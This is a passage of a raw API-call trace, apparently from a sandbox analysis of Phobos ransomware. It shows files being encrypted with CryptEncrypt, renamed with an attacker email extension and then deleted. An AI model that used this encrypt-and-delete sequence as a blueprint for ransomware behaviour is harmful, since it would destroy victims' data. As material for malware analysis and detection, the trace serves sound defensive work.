SetFilePointerEx (in: hFile=0x180, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2c9fb90 | out: lpNewFilePointer=0x0) returned 1 [0180.246] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Package Cache\\{582EA838-9199-3518-A05C-DB09462F68EC}v14.10.25017\\packages\\vcRuntimeMinimum_x86\\vc_runtimeMinimum_x86.msi.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\programdata\\package cache\\{582ea838-9199-3518-a05c-db09462f68ec}v14.10.25017\\packages\\vcruntimeminimum_x86\\vc_runtimeminimum_x86.msi.id[9c354b42-0001].[tedmundboardus@aol.com].phobos"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x178 [0180.246] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2c9fb48, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2c9fba4 | out: phKey=0x2c9fba4*=0xa32de8) returned 1 [0180.247] CryptSetKeyParam (hKey=0xa32de8, dwParam=0x1, pbData=0x2c9fc50, dwFlags=0x0) returned 1 [0180.247] ReadFile (in: hFile=0x180, lpBuffer=0x2f50020, nNumberOfBytesToRead=0x110100, lpNumberOfBytesRead=0x2c9fbcc, lpOverlapped=0x0 | out: lpBuffer=0x2f50020*, lpNumberOfBytesRead=0x2c9fbcc*=0x24000, lpOverlapped=0x0) returned 1 [0180.508] CryptEncrypt (in: hKey=0xa32de8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f50020*, pdwDataLen=0x2c9fb68*=0x24010, dwBufLen=0x24010 | out: pbData=0x2f50020*, pdwDataLen=0x2c9fb68*=0x24010) returned 1 [0180.509] WriteFile (in: hFile=0x178, lpBuffer=0x2f50020*, nNumberOfBytesToWrite=0x24010, lpNumberOfBytesWritten=0x2c9fbb0, lpOverlapped=0x0 | out: lpBuffer=0x2f50020*, lpNumberOfBytesWritten=0x2c9fbb0*=0x24010, lpOverlapped=0x0) returned 1 [0180.513] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2c9fb3c, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2c9fba8 | out: phKey=0x2c9fba8*=0xa32ae8) returned 1 [0180.513] CryptSetKeyParam (hKey=0xa32ae8, dwParam=0x1, pbData=0x2c9fc50, dwFlags=0x0) returned 1 [0180.513] CryptEncrypt (in: hKey=0xa32ae8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f50020*, pdwDataLen=0x2c9fb68*=0x60, dwBufLen=0x60 | out: pbData=0x2f50020*, pdwDataLen=0x2c9fb68*=0x60) returned 1 [0180.513] CryptDestroyKey (hKey=0xa32ae8) returned 1 [0180.513] WriteFile (in: hFile=0x178, lpBuffer=0x2f50020*, nNumberOfBytesToWrite=0x112, lpNumberOfBytesWritten=0x2c9fbb0, lpOverlapped=0x0 | out: lpBuffer=0x2f50020*, lpNumberOfBytesWritten=0x2c9fbb0*=0x112, lpOverlapped=0x0) returned 1 [0180.513] CryptDestroyKey (hKey=0xa32de8) returned 1 [0180.513] CloseHandle (hObject=0x180) returned 1 [0180.514] CloseHandle (hObject=0x178) returned 1 [0180.514] DeleteFileW (lpFileName="\\\\?\\C:\\ProgramData\\Package Cache\\{582EA838-9199-3518-A05C-DB09462F68EC}v14.10.25017\\packages\\vcRuntimeMinimum_x86\\vc_runtimeMinimum_x86.msi" (normalized: "c:\\programdata\\package cache\\{582ea838-9199-3518-a05c-db09462f68ec}v14.10.25017\\packages\\vcruntimeminimum_x86\\vc_runtimeminimum_x86.msi")) returned 1 [0180.517] CryptGenRandom (in: hProv=0xa24cf8, dwLen=0x10, pbBuffer=0x2c9fc50 | out: pbBuffer=0x2c9fc50) returned 1 [0180.517] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Package Cache\\{68306422-7C57-373F-8860-D26CE4BA2A15}v14.10.25017\\packages\\vcRuntimeAdditional_x86\\vc_runtimeAdditional_x86.msi" (normalized: "c:\\programdata\\package cache\\{68306422-7c57-373f-8860-d26ce4ba2a15}v14.10.25017\\packages\\vcruntimeadditional_x86\\vc_runtimeadditional_x86.msi"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x178 [0180.517] GetFileSizeEx (in: hFile=0x178, lpFileSize=0x2c9fbf0 | out: lpFileSize=0x2c9fbf0*=143360) returned 1 [0180.517] CloseHandle (hObject=0x178) returned 1 [0180.517] GetFileAttributesW (lpFileName="\\\\?\\C:\\ProgramData\\Package Cache\\{68306422-7C57-373F-8860-D26CE4BA2A15}v14.10.25017\\packages\\vcRuntimeAdditional_x86\\vc_runtimeAdditional_x86.msi" (normalized: "c:\\programdata\\package cache\\{68306422-7c57-373f-8860-d26ce4ba2a15}v14.10.25017\\packages\\vcruntimeadditional_x86\\vc_runtimeadditional_x86.msi")) returned 0x20 [0180.517] GetFileAttributesW (lpFileName="\\\\?\\C:\\ProgramData\\Package Cache\\{68306422-7C57-373F-8860-D26CE4BA2A15}v14.10.25017\\packages\\vcRuntimeAdditional_x86\\vc_runtimeAdditional_x86.msi.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\programdata\\package cache\\{68306422-7c57-373f-8860-d26ce4ba2a15}v14.10.25017\\packages\\vcruntimeadditional_x86\\vc_runtimeadditional_x86.msi.id[9c354b42-0001].[tedmundboardus@aol.com].phobos")) returned 0xffffffff [0180.517] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Package Cache\\{68306422-7C57-373F-8860-D26CE4BA2A15}v14.10.25017\\packages\\vcRuntimeAdditional_x86\\vc_runtimeAdditional_x86.msi" (normalized: "c:\\programdata\\package cache\\{68306422-7c57-373f-8860-d26ce4ba2a15}v14.10.25017\\packages\\vcruntimeadditional_x86\\vc_runtimeadditional_x86.msi"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x178 [0180.517] SetFilePointerEx (in: hFile=0x178, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2c9fb90 | out: lpNewFilePointer=0x0) returned 1 [0180.518] SetFilePointerEx (in: hFile=0x178, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2c9fb90 | out: lpNewFilePointer=0x0) returned 1 [0180.669] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Package Cache\\{68306422-7C57-373F-8860-D26CE4BA2A15}v14.10.25017\\packages\\vcRuntimeAdditional_x86\\vc_runtimeAdditional_x86.msi.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\programdata\\package cache\\{68306422-7c57-373f-8860-d26ce4ba2a15}v14.10.25017\\packages\\vcruntimeadditional_x86\\vc_runtimeadditional_x86.msi.id[9c354b42-0001].[tedmundboardus@aol.com].phobos"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x180 [0180.672] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2c9fb48, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2c9fba4 | out: phKey=0x2c9fba4*=0xa32de8) returned 1 [0180.672] CryptSetKeyParam (hKey=0xa32de8, dwParam=0x1, pbData=0x2c9fc50, dwFlags=0x0) returned 1 [0180.672] ReadFile (in: hFile=0x178, lpBuffer=0x2f50020, nNumberOfBytesToRead=0x110100, lpNumberOfBytesRead=0x2c9fbcc, lpOverlapped=0x0 | out: lpBuffer=0x2f50020*, lpNumberOfBytesRead=0x2c9fbcc*=0x23000, lpOverlapped=0x0) returned 1 [0180.751] CryptEncrypt (in: hKey=0xa32de8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f50020*, pdwDataLen=0x2c9fb68*=0x23010, dwBufLen=0x23010 | out: pbData=0x2f50020*, pdwDataLen=0x2c9fb68*=0x23010) returned 1 [0180.752] WriteFile (in: hFile=0x180, lpBuffer=0x2f50020*, nNumberOfBytesToWrite=0x23010, lpNumberOfBytesWritten=0x2c9fbb0, lpOverlapped=0x0 | out: lpBuffer=0x2f50020*, lpNumberOfBytesWritten=0x2c9fbb0*=0x23010, lpOverlapped=0x0) returned 1 [0180.755] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2c9fb3c, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2c9fba8 | out: phKey=0x2c9fba8*=0xa32a68) returned 1 [0180.755] CryptSetKeyParam (hKey=0xa32a68, dwParam=0x1, pbData=0x2c9fc50, dwFlags=0x0) returned 1 [0180.755] CryptEncrypt (in: hKey=0xa32a68, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f50020*, pdwDataLen=0x2c9fb68*=0x60, dwBufLen=0x60 | out: pbData=0x2f50020*, pdwDataLen=0x2c9fb68*=0x60) returned 1 [0180.755] CryptDestroyKey (hKey=0xa32a68) returned 1 [0180.755] WriteFile (in: hFile=0x180, lpBuffer=0x2f50020*, nNumberOfBytesToWrite=0x112, lpNumberOfBytesWritten=0x2c9fbb0, lpOverlapped=0x0 | out: lpBuffer=0x2f50020*, lpNumberOfBytesWritten=0x2c9fbb0*=0x112, lpOverlapped=0x0) returned 1 [0180.755] CryptDestroyKey (hKey=0xa32de8) returned 1 [0180.755] CloseHandle (hObject=0x178) returned 1 [0180.755] CloseHandle (hObject=0x180) returned 1 [0180.755] DeleteFileW (lpFileName="\\\\?\\C:\\ProgramData\\Package Cache\\{68306422-7C57-373F-8860-D26CE4BA2A15}v14.10.25017\\packages\\vcRuntimeAdditional_x86\\vc_runtimeAdditional_x86.msi" (normalized: "c:\\programdata\\package cache\\{68306422-7c57-373f-8860-d26ce4ba2a15}v14.10.25017\\packages\\vcruntimeadditional_x86\\vc_runtimeadditional_x86.msi")) returned 1 [0180.758] CryptGenRandom (in: hProv=0xa24cf8, dwLen=0x10, pbBuffer=0x2c9fc50 | out: pbBuffer=0x2c9fc50) returned 1 [0180.758] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Package Cache\\{8D4F7A6D-6B81-3DC8-9C21-6008E4866727}v14.10.25017\\packages\\vcRuntimeMinimum_amd64\\cab1.cab" (normalized: "c:\\programdata\\package cache\\{8d4f7a6d-6b81-3dc8-9c21-6008e4866727}v14.10.25017\\packages\\vcruntimeminimum_amd64\\cab1.cab"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x180 [0180.758] GetFileSizeEx (in: hFile=0x180, lpFileSize=0x2c9fbf0 | out: lpFileSize=0x2c9fbf0*=1462871) returned 1 [0180.759] CloseHandle (hObject=0x180) returned 1 [0180.759] GetFileAttributesW (lpFileName="\\\\?\\C:\\ProgramData\\Package Cache\\{8D4F7A6D-6B81-3DC8-9C21-6008E4866727}v14.10.25017\\packages\\vcRuntimeMinimum_amd64\\cab1.cab" (normalized: "c:\\programdata\\package cache\\{8d4f7a6d-6b81-3dc8-9c21-6008e4866727}v14.10.25017\\packages\\vcruntimeminimum_amd64\\cab1.cab")) returned 0x20 [0180.759] GetFileAttributesW (lpFileName="\\\\?\\C:\\ProgramData\\Package Cache\\{8D4F7A6D-6B81-3DC8-9C21-6008E4866727}v14.10.25017\\packages\\vcRuntimeMinimum_amd64\\cab1.cab.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\programdata\\package cache\\{8d4f7a6d-6b81-3dc8-9c21-6008e4866727}v14.10.25017\\packages\\vcruntimeminimum_amd64\\cab1.cab.id[9c354b42-0001].[tedmundboardus@aol.com].phobos")) returned 0xffffffff [0180.759] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Package Cache\\{8D4F7A6D-6B81-3DC8-9C21-6008E4866727}v14.10.25017\\packages\\vcRuntimeMinimum_amd64\\cab1.cab" (normalized: "c:\\programdata\\package cache\\{8d4f7a6d-6b81-3dc8-9c21-6008e4866727}v14.10.25017\\packages\\vcruntimeminimum_amd64\\cab1.cab"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x180 [0180.759] SetFilePointerEx (in: hFile=0x180, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2c9fb90 | out: lpNewFilePointer=0x0) returned 1 [0180.759] SetFilePointerEx (in: hFile=0x180, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2c9fb90 | out: lpNewFilePointer=0x0) returned 1 [0180.759] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Package Cache\\{8D4F7A6D-6B81-3DC8-9C21-6008E4866727}v14.10.25017\\packages\\vcRuntimeMinimum_amd64\\cab1.cab.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\programdata\\package cache\\{8d4f7a6d-6b81-3dc8-9c21-6008e4866727}v14.10.25017\\packages\\vcruntimeminimum_amd64\\cab1.cab.id[9c354b42-0001].[tedmundboardus@aol.com].phobos"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x178 [0180.768] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2c9fb48, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2c9fba4 | out: phKey=0x2c9fba4*=0xa32de8) returned 1 [0180.768] CryptSetKeyParam (hKey=0xa32de8, dwParam=0x1, pbData=0x2c9fc50, dwFlags=0x0) returned 1 [0180.768] ReadFile (in: hFile=0x180, lpBuffer=0x2f50020, nNumberOfBytesToRead=0x110100, lpNumberOfBytesRead=0x2c9fbcc, lpOverlapped=0x0 | out: lpBuffer=0x2f50020*, lpNumberOfBytesRead=0x2c9fbcc*=0x110100, lpOverlapped=0x0) returned 1 [0180.843] CryptEncrypt (in: hKey=0xa32de8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f50020*, pdwDataLen=0x2c9fb68*=0x110100, dwBufLen=0x110100 | out: pbData=0x2f50020*, pdwDataLen=0x2c9fb68*=0x110100) returned 1 [0180.857] WriteFile (in: hFile=0x178, lpBuffer=0x2f50020*, nNumberOfBytesToWrite=0x110100, lpNumberOfBytesWritten=0x2c9fbb0, lpOverlapped=0x0 | out: lpBuffer=0x2f50020*, lpNumberOfBytesWritten=0x2c9fbb0*=0x110100, lpOverlapped=0x0) returned 1 [0180.942] ReadFile (in: hFile=0x180, lpBuffer=0x2f50020, nNumberOfBytesToRead=0x110100, lpNumberOfBytesRead=0x2c9fbcc, lpOverlapped=0x0 | out: lpBuffer=0x2f50020*, lpNumberOfBytesRead=0x2c9fbcc*=0x55157, lpOverlapped=0x0) returned 1 [0181.037] CryptEncrypt (in: hKey=0xa32de8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f50020*, pdwDataLen=0x2c9fb68*=0x55160, dwBufLen=0x55160 | out: pbData=0x2f50020*, pdwDataLen=0x2c9fb68*=0x55160) returned 1 [0181.040] WriteFile (in: hFile=0x178, lpBuffer=0x2f50020*, nNumberOfBytesToWrite=0x55160, lpNumberOfBytesWritten=0x2c9fbb0, lpOverlapped=0x0 | out: lpBuffer=0x2f50020*, lpNumberOfBytesWritten=0x2c9fbb0*=0x55160, lpOverlapped=0x0) returned 1 [0181.045] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2c9fb3c, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2c9fba8 | out: phKey=0x2c9fba8*=0xa32c68) returned 1 [0181.045] CryptSetKeyParam (hKey=0xa32c68, dwParam=0x1, pbData=0x2c9fc50, dwFlags=0x0) returned 1 [0181.045] CryptEncrypt (in: hKey=0xa32c68, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f50020*, pdwDataLen=0x2c9fb68*=0x40, dwBufLen=0x40 | out: pbData=0x2f50020*, pdwDataLen=0x2c9fb68*=0x40) returned 1 [0181.045] CryptDestroyKey (hKey=0xa32c68) returned 1 [0181.045] WriteFile (in: hFile=0x178, lpBuffer=0x2f50020*, nNumberOfBytesToWrite=0xf2, lpNumberOfBytesWritten=0x2c9fbb0, lpOverlapped=0x0 | out: lpBuffer=0x2f50020*, lpNumberOfBytesWritten=0x2c9fbb0*=0xf2, lpOverlapped=0x0) returned 1 [0181.045] CryptDestroyKey (hKey=0xa32de8) returned 1 [0181.045] CloseHandle (hObject=0x180) returned 1 [0181.045] CloseHandle (hObject=0x178) returned 1 [0181.045] DeleteFileW (lpFileName="\\\\?\\C:\\ProgramData\\Package Cache\\{8D4F7A6D-6B81-3DC8-9C21-6008E4866727}v14.10.25017\\packages\\vcRuntimeMinimum_amd64\\cab1.cab" (normalized: "c:\\programdata\\package cache\\{8d4f7a6d-6b81-3dc8-9c21-6008e4866727}v14.10.25017\\packages\\vcruntimeminimum_amd64\\cab1.cab")) returned 1 [0181.050] CryptGenRandom (in: hProv=0xa24cf8, dwLen=0x10, pbBuffer=0x2c9fc50 | out: pbBuffer=0x2c9fc50) returned 1 [0181.050] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Package Cache\\{929FBD26-9020-399B-9A7A-751D61F0B942}v12.0.21005\\packages\\vcRuntimeAdditional_amd64\\vc_runtimeAdditional_x64.msi" (normalized: "c:\\programdata\\package cache\\{929fbd26-9020-399b-9a7a-751d61f0b942}v12.0.21005\\packages\\vcruntimeadditional_amd64\\vc_runtimeadditional_x64.msi"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x15c [0181.128] GetFileSizeEx (in: hFile=0x15c, lpFileSize=0x2c9fbf0 | out: lpFileSize=0x2c9fbf0*=143360) returned 1 [0181.128] CloseHandle (hObject=0x15c) returned 1 [0181.130] GetFileAttributesW (lpFileName="\\\\?\\C:\\ProgramData\\Package Cache\\{929FBD26-9020-399B-9A7A-751D61F0B942}v12.0.21005\\packages\\vcRuntimeAdditional_amd64\\vc_runtimeAdditional_x64.msi" (normalized: "c:\\programdata\\package cache\\{929fbd26-9020-399b-9a7a-751d61f0b942}v12.0.21005\\packages\\vcruntimeadditional_amd64\\vc_runtimeadditional_x64.msi")) returned 0x20 [0181.131] GetFileAttributesW (lpFileName="\\\\?\\C:\\ProgramData\\Package Cache\\{929FBD26-9020-399B-9A7A-751D61F0B942}v12.0.21005\\packages\\vcRuntimeAdditional_amd64\\vc_runtimeAdditional_x64.msi.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\programdata\\package cache\\{929fbd26-9020-399b-9a7a-751d61f0b942}v12.0.21005\\packages\\vcruntimeadditional_amd64\\vc_runtimeadditional_x64.msi.id[9c354b42-0001].[tedmundboardus@aol.com].phobos")) returned 0xffffffff [0181.131] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Package Cache\\{929FBD26-9020-399B-9A7A-751D61F0B942}v12.0.21005\\packages\\vcRuntimeAdditional_amd64\\vc_runtimeAdditional_x64.msi" (normalized: "c:\\programdata\\package cache\\{929fbd26-9020-399b-9a7a-751d61f0b942}v12.0.21005\\packages\\vcruntimeadditional_amd64\\vc_runtimeadditional_x64.msi"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x15c [0181.131] SetFilePointerEx (in: hFile=0x15c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2c9fb90 | out: lpNewFilePointer=0x0) returned 1 [0181.131] SetFilePointerEx (in: hFile=0x15c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2c9fb90 | out: lpNewFilePointer=0x0) returned 1 [0181.131] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Package Cache\\{929FBD26-9020-399B-9A7A-751D61F0B942}v12.0.21005\\packages\\vcRuntimeAdditional_amd64\\vc_runtimeAdditional_x64.msi.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\programdata\\package cache\\{929fbd26-9020-399b-9a7a-751d61f0b942}v12.0.21005\\packages\\vcruntimeadditional_amd64\\vc_runtimeadditional_x64.msi.id[9c354b42-0001].[tedmundboardus@aol.com].phobos"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x178 [0181.132] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2c9fb48, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2c9fba4 | out: phKey=0x2c9fba4*=0xa32d68) returned 1 [0181.132] CryptSetKeyParam (hKey=0xa32d68, dwParam=0x1, pbData=0x2c9fc50, dwFlags=0x0) returned 1 [0181.132] ReadFile (in: hFile=0x15c, lpBuffer=0x2f50020, nNumberOfBytesToRead=0x110100, lpNumberOfBytesRead=0x2c9fbcc, lpOverlapped=0x0 | out: lpBuffer=0x2f50020*, lpNumberOfBytesRead=0x2c9fbcc*=0x23000, lpOverlapped=0x0) returned 1 [0181.212] CryptEncrypt (in: hKey=0xa32d68, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f50020*, pdwDataLen=0x2c9fb68*=0x23010, dwBufLen=0x23010 | out: pbData=0x2f50020*, pdwDataLen=0x2c9fb68*=0x23010) returned 1 [0181.213] WriteFile (in: hFile=0x178, lpBuffer=0x2f50020*, nNumberOfBytesToWrite=0x23010, lpNumberOfBytesWritten=0x2c9fbb0, lpOverlapped=0x0 | out: lpBuffer=0x2f50020*, lpNumberOfBytesWritten=0x2c9fbb0*=0x23010, lpOverlapped=0x0) returned 1 [0181.221] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2c9fb3c, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2c9fba8 | out: phKey=0x2c9fba8*=0xa32aa8) returned 1 [0181.221] CryptSetKeyParam (hKey=0xa32aa8, dwParam=0x1, pbData=0x2c9fc50, dwFlags=0x0) returned 1 [0181.221] CryptEncrypt (in: hKey=0xa32aa8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f50020*, pdwDataLen=0x2c9fb68*=0x60, dwBufLen=0x60 | out: pbData=0x2f50020*, pdwDataLen=0x2c9fb68*=0x60) returned 1 [0181.221] CryptDestroyKey (hKey=0xa32aa8) returned 1 [0181.221] WriteFile (in: hFile=0x178, lpBuffer=0x2f50020*, nNumberOfBytesToWrite=0x112, lpNumberOfBytesWritten=0x2c9fbb0, lpOverlapped=0x0 | out: lpBuffer=0x2f50020*, lpNumberOfBytesWritten=0x2c9fbb0*=0x112, lpOverlapped=0x0) returned 1 [0181.221] CryptDestroyKey (hKey=0xa32d68) returned 1 [0181.221] CloseHandle (hObject=0x15c) returned 1 [0181.221] CloseHandle (hObject=0x178) returned 1 [0181.221] DeleteFileW (lpFileName="\\\\?\\C:\\ProgramData\\Package Cache\\{929FBD26-9020-399B-9A7A-751D61F0B942}v12.0.21005\\packages\\vcRuntimeAdditional_amd64\\vc_runtimeAdditional_x64.msi" (normalized: "c:\\programdata\\package cache\\{929fbd26-9020-399b-9a7a-751d61f0b942}v12.0.21005\\packages\\vcruntimeadditional_amd64\\vc_runtimeadditional_x64.msi")) returned 1 [0181.224] CryptGenRandom (in: hProv=0xa24cf8, dwLen=0x10, pbBuffer=0x2c9fc50 | out: pbBuffer=0x2c9fc50) returned 1 [0181.224] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Package Cache\\{A749D8E6-B613-3BE3-8F5F-045C84EBA29B}v12.0.21005\\packages\\vcRuntimeMinimum_amd64\\cab1.cab" (normalized: "c:\\programdata\\package cache\\{a749d8e6-b613-3be3-8f5f-045c84eba29b}v12.0.21005\\packages\\vcruntimeminimum_amd64\\cab1.cab"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x178 [0181.224] GetFileSizeEx (in: hFile=0x178, lpFileSize=0x2c9fbf0 | out: lpFileSize=0x2c9fbf0*=1034506) returned 1 [0181.224] CloseHandle (hObject=0x178) returned 1 [0181.224] GetFileAttributesW (lpFileName="\\\\?\\C:\\ProgramData\\Package Cache\\{A749D8E6-B613-3BE3-8F5F-045C84EBA29B}v12.0.21005\\packages\\vcRuntimeMinimum_amd64\\cab1.cab" (normalized: "c:\\programdata\\package cache\\{a749d8e6-b613-3be3-8f5f-045c84eba29b}v12.0.21005\\packages\\vcruntimeminimum_amd64\\cab1.cab")) returned 0x20 [0181.224] GetFileAttributesW (lpFileName="\\\\?\\C:\\ProgramData\\Package Cache\\{A749D8E6-B613-3BE3-8F5F-045C84EBA29B}v12.0.21005\\packages\\vcRuntimeMinimum_amd64\\cab1.cab.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\programdata\\package cache\\{a749d8e6-b613-3be3-8f5f-045c84eba29b}v12.0.21005\\packages\\vcruntimeminimum_amd64\\cab1.cab.id[9c354b42-0001].[tedmundboardus@aol.com].phobos")) returned 0xffffffff [0181.225] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Package Cache\\{A749D8E6-B613-3BE3-8F5F-045C84EBA29B}v12.0.21005\\packages\\vcRuntimeMinimum_amd64\\cab1.cab" (normalized: "c:\\programdata\\package cache\\{a749d8e6-b613-3be3-8f5f-045c84eba29b}v12.0.21005\\packages\\vcruntimeminimum_amd64\\cab1.cab"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x178 [0181.225] SetFilePointerEx (in: hFile=0x178, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2c9fb90 | out: lpNewFilePointer=0x0) returned 1 [0181.225] SetFilePointerEx (in: hFile=0x178, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2c9fb90 | out: lpNewFilePointer=0x0) returned 1 [0181.225] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Package Cache\\{A749D8E6-B613-3BE3-8F5F-045C84EBA29B}v12.0.21005\\packages\\vcRuntimeMinimum_amd64\\cab1.cab.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\programdata\\package cache\\{a749d8e6-b613-3be3-8f5f-045c84eba29b}v12.0.21005\\packages\\vcruntimeminimum_amd64\\cab1.cab.id[9c354b42-0001].[tedmundboardus@aol.com].phobos"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x134 [0181.241] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2c9fb48, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2c9fba4 | out: phKey=0x2c9fba4*=0xa32aa8) returned 1 [0181.241] CryptSetKeyParam (hKey=0xa32aa8, dwParam=0x1, pbData=0x2c9fc50, dwFlags=0x0) returned 1 [0181.241] ReadFile (in: hFile=0x178, lpBuffer=0x2f50020, nNumberOfBytesToRead=0x110100, lpNumberOfBytesRead=0x2c9fbcc, lpOverlapped=0x0 | out: lpBuffer=0x2f50020*, lpNumberOfBytesRead=0x2c9fbcc*=0xfc90a, lpOverlapped=0x0) returned 1 [0181.268] CryptEncrypt (in: hKey=0xa32aa8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f50020*, pdwDataLen=0x2c9fb68*=0xfc910, dwBufLen=0xfc910 | out: pbData=0x2f50020*, pdwDataLen=0x2c9fb68*=0xfc910) returned 1 [0181.276] WriteFile (in: hFile=0x134, lpBuffer=0x2f50020*, nNumberOfBytesToWrite=0xfc910, lpNumberOfBytesWritten=0x2c9fbb0, lpOverlapped=0x0 | out: lpBuffer=0x2f50020*, lpNumberOfBytesWritten=0x2c9fbb0*=0xfc910, lpOverlapped=0x0) returned 1 [0181.777] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2c9fb3c, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2c9fba8 | out: phKey=0x2c9fba8*=0xa32d68) returned 1 [0181.777] CryptSetKeyParam (hKey=0xa32d68, dwParam=0x1, pbData=0x2c9fc50, dwFlags=0x0) returned 1 [0181.777] CryptEncrypt (in: hKey=0xa32d68, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f50020*, pdwDataLen=0x2c9fb68*=0x40, dwBufLen=0x40 | out: pbData=0x2f50020*, pdwDataLen=0x2c9fb68*=0x40) returned 1 [0181.777] CryptDestroyKey (hKey=0xa32d68) returned 1 [0181.777] WriteFile (in: hFile=0x134, lpBuffer=0x2f50020*, nNumberOfBytesToWrite=0xf2, lpNumberOfBytesWritten=0x2c9fbb0, lpOverlapped=0x0 | out: lpBuffer=0x2f50020*, lpNumberOfBytesWritten=0x2c9fbb0*=0xf2, lpOverlapped=0x0) returned 1 [0181.777] CryptDestroyKey (hKey=0xa32aa8) returned 1 [0181.777] CloseHandle 